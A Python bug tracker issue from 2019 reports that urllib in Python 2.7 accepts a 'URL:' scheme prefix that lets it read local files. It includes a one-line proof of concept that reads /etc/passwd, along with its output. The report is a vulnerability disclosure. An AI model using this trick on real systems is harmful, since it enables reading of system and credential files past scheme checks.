classification
Title: Unnecessary URL scheme exists to allow 'URL: reading file in urllib
Type: security Stage:
Components: Library (Lib) Versions: Python 2.7
process
Status: open Resolution:
Dependencies: Superseder:
Assigned To: Nosy List: Alyan
Priority: normal Keywords:

Created on 2019-08-11 11:16 by Alyan, last changed 2019-08-11 11:16 by Alyan.

Messages (1)
msg349385 - (view) Author: Abdullah (Alyan) Date: 2019-08-11 11:16
I am not sure if this was reported before, fixed, or even how to report this. However this issue is similar to https://bugs.python.org/issue35907

# Vulnerability PoC
import urllib
print urllib.urlopen('URL:/etc/passwd').read()[:30]
the result is
##
# User Database
# 
# Note t

I have tested the PoC on my Mac python 2.7.
History
Date User Action Args
2019-08-11 11:16:29Alyancreate